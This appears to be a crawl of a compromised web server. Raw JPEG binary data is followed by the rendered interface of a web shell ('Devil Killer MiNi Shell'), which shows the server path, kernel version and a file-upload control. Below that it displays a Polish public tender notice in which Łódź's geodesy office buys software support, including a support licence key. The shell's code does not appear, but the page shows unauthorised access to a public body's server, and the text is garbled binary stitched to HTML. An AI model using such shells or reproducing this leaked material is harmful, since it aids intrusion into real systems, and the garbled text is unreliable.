JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211012/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211012/0022963801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przedmiotem zamówienia jest zakup usług serwisowych dla posiadanego przez Łódzki Ośrodek Geodezji sprzętu komputerowego i oprogramowania w trzech zadaniach częściowych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Łódzki Ośrodek Geodezji</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Miasto Łódź</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 470830536</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Traugutta 21/23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-113</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">422726806</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">422726801</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przteragi@log.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.log.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup usług serwisowych dla posiadanego przez Łódzki Ośrodek Geodezji sprzętu komputerowego i oprogramowania w trzech zadaniach częściowych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2fd51a17-2812-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00229638</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009133/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Utrzymanie i modyfikacja systemu informatycznego do archiwizacji dokumentów OSKAN </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.log.lodz.pl/modgikwww/pl/Zamowieniapubliczne.aspx; https://miniportal.uzp.gov.pl; przetargi@log.lodz.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://www.log.lodz.pl/modgikwww/pl/Zamowieniapubliczne.aspx</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej, tj. przy użyciu miniPortalu ( https://miniportal.uzp.gov.pl/ , ePUAP-u http://epuap.gov.pl/wps/portal/E2_OpisUslugi?nazwaOpisu=Pismo+ogolne+do+urzedu&idPodmiotu=LOG oraz poczty elektronicznej przetargi@log.lodz.pl <br/>2. MiniPortal https://miniportal.uzp.gov.pl/ oraz ePUAP http://epuap.gov.pl/wps/portal/E2_OpisUslugi?nazwaOpisu=Pismo+ogolne+do+urzedu&idPodmiotu=LOG służą wyłącznie do składania/ wycofywania i zmiany ofert. Wszelka pozostała korespondencja przekazywana będzie za pomocą poczty elektronicznej. <br/>3.Zamawiający dopuszcza format danych przesyłanych pocztą elektroniczną określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2020 r. poz. 346, 568, 695, 1517 i 2320), np: .pdf, .doc, .docx, xls, .xlsx, .rtf, .txt, .odt, .ods, .jpg, .jpeg, .tif, .tiff, .png. Do kompresji dokumentów Zamawiający dopuszcza formaty .zip, 7z. Pliki przesyłane pocztą elektroniczną nie mogą być zabezpieczone hasłem lub zaszyfrowane Rozmiar pojedynczej wiadomości przesyłanej pocztą elektroniczną nie może przekroczyć 15 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO <br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Łódzki Ośrodek Geodezji, ul. Traugutta 21/23, 90-113 Łódź;<br/>	sprawy/pytania do Inspektora ochrony danych osobowych w Łódzkim Ośrodku Geodezji prosimy kierować na adres e-mail: iod@log.lodz.pl, tel.: 042 272 68 96;<br/>▪	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego p/n: „zakup usług serwisowych dla posiadanego przez Łódzki Ośrodek Geodezji sprzętu komputerowego i oprogramowania w czterech zadaniach częściowych”’, nr sprawy OAZP.2610/40/2021 prowadzonego w trybie przetargu nieograniczonego. <br/>▪	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 19 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 12019 ze zm.), dalej „ustawa Pzp”; <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy i dochodzenia roszczeń oraz przez okres wynikający wprost z przepisów prawa (np. prawa podatkowego).<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. …”</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OAZP.2610/40/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 57850,41 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie częściowe Nr 1<br/>I.	OSCAN – 12 miesięczny pakiet serwisowy - zakres podstawowy<br/>OSCAN – 12 miesięczny pakiet serwisowy. Licencja nr 1/9511-092/2011	•	Okres od 01.11.2021r. do 31.10.2022r.<br/>1.	Przedmiotem zamówienia jest Usługa asysty technicznej dla oprogramowania OPGK OSCAN w zakresie i na warunkach określonych w Umowie stanowiącej załączniki nr 4.1. do s.i.w.z.<br/>2.	Usługi asysty technicznej obejmują:<br/>a)	otrzymywanie aktualizacji Oprogramowania;<br/>b)	otrzymywanie nowych wersji Oprogramowania i udoskonaleń do wersji bieżących Oprogramowania (otrzymywanie nowych edycji Oprogramowania, wydań uzupełniających, poprawek programistycznych) wraz z licencjami bez dodatkowych opłat licencyjnych. Zamawiający uzyskuje prawo do nieodpłatnego zainstalowania, uruchamiania, przechowywania i korzystania z aktualizacji Oprogramowania, w ilościach zgodnych z licencjami nr 1/9511-092/2011;<br/>c)	przeniesienia Oprogramowania, w tym jego aktualizacji, na inną platformę systemową wspieraną przez Producenta Oprogramowania oraz wsparcia technicznego Zamawiającego w tym zakresie;<br/>c.1)Gwarantowanego czasu usunięcia błędu o charakterze USTERKA	7 dni roboczych<br/>c.2)Gwarantowanego czasu usunięcia błędu o charakterze AWARIA	3 dni robocze<br/>c.3)Dostępu do telefonicznych konsultacji <br/>c.4)Pakiet godzin konsultacji w ramach SUPPORTU 40 godzin<br/>c.5)Pakiet godzin programistycznych w ramach SUPPORTU 40 godzin<br/>d)	asysty elektronicznej i telefonicznej w zakresie problemów, oraz zgłaszania Błędów do Wykonawcy<br/>3.	Usługę asysty technicznej Wykonawca zobowiązany będzie świadczyć w dni robocze, w godzinach 8.00-17.00 w odniesieniu do licencji nr 1/9511-092/2011. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 41820 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72591000-4 - Rozszerzanie umów serwisowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji, tj. zakupu dodatkowych Usług rozwojowych Oprogramowania stosownie do art. 441 ustawy Pzp, tj. prawo do podjęcia decyzji o realizacji przedmiotu zamówienia w szerszym zakresie niż wskazany powyżej lub w przypadku konieczności zapewnienia ciągłości usług będących przedmiotem Umowy. <br/>2.	Prawo opcji polegać będzie na możliwości zlecenia Wykonawcy realizacji dodatkowych usług w ramach rodzajów usług będących przedmiotem niniejszego zamówienia. Potrzeba taka może wynikać z konieczności realizacji zmian w Oprogramowaniu w celu zapewnienia możliwości pełniejszego wykorzystania go do współpracy z używanym przez Zamawiającego systemem wspierającym ewidencję gruntów. W związku ze zmianami prawnymi Zamawiający ma obowiązek prowadzenia zasobu operatów elektronicznych. Zmodyfikowany w tym zakresie system wspierający prowadzenie ewidencji gruntów dla zapewnienia pełnej funkcjonalności powinien mieć możliwość przechowywania w zasobach Oprogramowania także i tej kategorii dokumentów. Opcją jest: Usługa rozwoju użytkowanego przez ŁOG Oprogramowania – przez co należy rozumieć prawo do zamówienia (w ramach opcji) modyfikacji Oprogramowania o nowe funkcjonalności lub zmianę już działających funkcjonalności oraz usług integrujących Oprogramowanie z innymi produktami, a także usług związanych z wdrożeniem, instalacją i konfiguracją dostarczonych modyfikacji Oprogramowania w ilości nie przekraczającej 120 roboczogodzin.<br/>3.	Usługi rozwojowe Oprogramowania objęte prawem opcji zostaną zakupione w zależności od potrzeb i posiadanych środków przez Zamawiającego zgodnie z następującymi zasadami: <br/>1)	prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe; <br/>2)	wykaz usług objętych prawem opcji, wynikać będzie z ustalonej przez Strony pracochłonności zadania i stałej stawki za jedną roboczogodzinę i obliczane będzie wg wzoru: <br/>Wynagrodzenie [zł] = uzgodniona pracochłonność [rbg.] x stawka za rbg. [zł/rbg.].<br/>UWAGA: Łączna ilość prac zleconych w ramach usług rozwojowych do wykonania w ramach Prawa Opcji nie może przekroczyć 120 roboczogodzin, co oznacza, że maksymalna wartość opcji wyniesie [__________] zł.<br/>4.	Prace wykonywane w ramach Prawa Opcji mogą być zlecane i wykonywane w czasie trwania Umowy, tzn. w okresie od dnia 1 listopada 2021 r. do dnia 31 października 2022 r. i rozliczane będą każdorazowo na podstawie ustalonego przez Strony zakresu prac i ich pracochłonności wg wzoru określonego w ust. 6 powyżej.<br/>5.	Odbiór wykonanych w ramach Prawa Opcji prac każdorazowo zostanie dokonany na podstawie bezusterkowego Protokołu Odbioru, który jest podstawą do wystawienia faktur z tytułu wykonanych prac.<br/>6.	Wynagrodzenie za wykonanie przedmiotu Umowy oraz za realizację prac zlecanych w ramach Prawa Opcji obejmuje również wynagrodzenie za przeniesienie na rzecz Zamawiającego autorskich praw majątkowych, licencji/sublicencji oraz praw zależnych do wszelkich utworów jakie mogą powstać w związku z wykonaniem Usługi rozwoju do Oprogramowania oraz realizacji prac zlecanych w ramach Prawa Opcji.<br/>7.	Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji Umowy. <br/>8.	W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <br/>9.	Warunkiem uruchomiania prawa opcji jest złożenie przez Zamawiającego oświadczenia woli w przedmiocie skorzystania z prawa opcji w określonym przez niego zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-11-01 do 2022-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto roboczo godziny rozwojowej (prawo opcji)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa bezpłatna asysta techniczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie częściowe nr 2<br/>IT Manager – 12 miesięczny pakiet serwisowy. SUPPORT STANDARD dla klucz: CD39216E3AE59095E1E339EA13408DB7 .<br/>1.	Terminy realizacji przedmiotu umowy ustala się dla zadania częściowego nr 2 dla IT Manager •SUPPORT STANDARD dla klucz: CD39216E3AE59095E1E339EA13408DB7; od dnia 1.12.2021r. do dnia 30.11.2022r. Wykonawca zobowiązany będzie dostarczyć suport dla 50 stanowisk. <br/>2.	W ramach Usługi asysty technicznej świadczonej przez Wykonawcę, Zamawiający będzie miał prawo do:<br/>1)	otrzymywania aktualizacji Oprogramowania IT Manager;<br/>2)	otrzymywania nowych wersji Oprogramowania i udoskonaleń do wersji bieżących Oprogramowania (otrzymywanie nowych edycji Oprogramowania IT Manager, wydań uzupełniających, poprawek programistycznych) wraz z licencjami bez dodatkowych opłat licencyjnych. Zamawiający uzyskuje prawo do nieodpłatnego zainstalowania, uruchamiania, przechowywania i korzystania z aktualizacji Oprogramowania IT Manager, w ilościach zgodnych z określonymi w § 2 ust. 2 Umowy;<br/>3)	przeniesienia Oprogramowania IT Manager, w tym jego aktualizacji, na inną platformę systemową wspieraną przez Producenta oraz wsparcia technicznego Zamawiającego w tym zakresie;<br/>4)	Gwarantowanego czasu usunięcia błędu o charakterze USTERKA	14 dni roboczych<br/>5)	Gwarantowanego czasu usunięcia błędu o charakterze AWARIA	7 dni roboczych<br/>6)	Dostęp do telefonicznych konsultacji tak<br/>7)	Pakiet godzin konsultacji w ramach SUPPORTU	0 godzin<br/>8)	Pakiet godzin programistycznych w ramach SUPPORTU	0 godzin<br/>9)	asysty elektronicznej i telefonicznej w zakresie problemów, oraz zgłaszania Błędów do Wykonawcy pod numer telefonu: ………….. , numer faksu: ……….. e-mail: .................., przyjmowanych pisemnie w Dni Robocze za zwrotnym potwierdzeniem odbioru.<br/>3.	Wykonawca zobowiązuje się dostarczać do siedziby Zamawiającego nośniki lub udostępnić oprogramowanie w wersji elektronicznej na stronach internetowych, na których zapisane będą aktualizacje Oprogramowania IT Manager, nowe wersje Oprogramowania IT Manager i udoskonalenia do wersji bieżących Oprogramowania IT Manager, zwane dalej aktualizacją Oprogramowania IT Manager, bądź umożliwić ich pobranie ze strony internetowej Producenta Oprogramowania IT Manager, w terminie do 30 dni od chwili pojawienia się aktualizacji, nowej wersji lub udoskonalenia Oprogramowania.<br/>4.	Wykonawca zapewnia, że nowe wersje Oprogramowania IT Manager, aktualizacje wersji Oprogramowania IT Manager oraz udoskonalenia do wersji bieżących Oprogramowania IT Manager, o których mowa w § 2 ust. 2 umowy zostaną przekazane Zamawiającemu na nośnikach wolnych od wad.<br/>5.	Wykonawca gwarantuje, że Asysta Techniczna będzie świadczona w sposób profesjonalny zgodnie ze standardami obowiązującymi w branży informatycznej. Wykonawca na wykonaną Asystę Techniczną udziela gwarancji na okres 90 dni licząc od dnia wykonania usług wchodzących w zakres Asysty Technicznej. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 6037,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72591000-4 - Rozszerzanie umów serwisowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-12-01 do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa bezpłatna asysta techniczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub 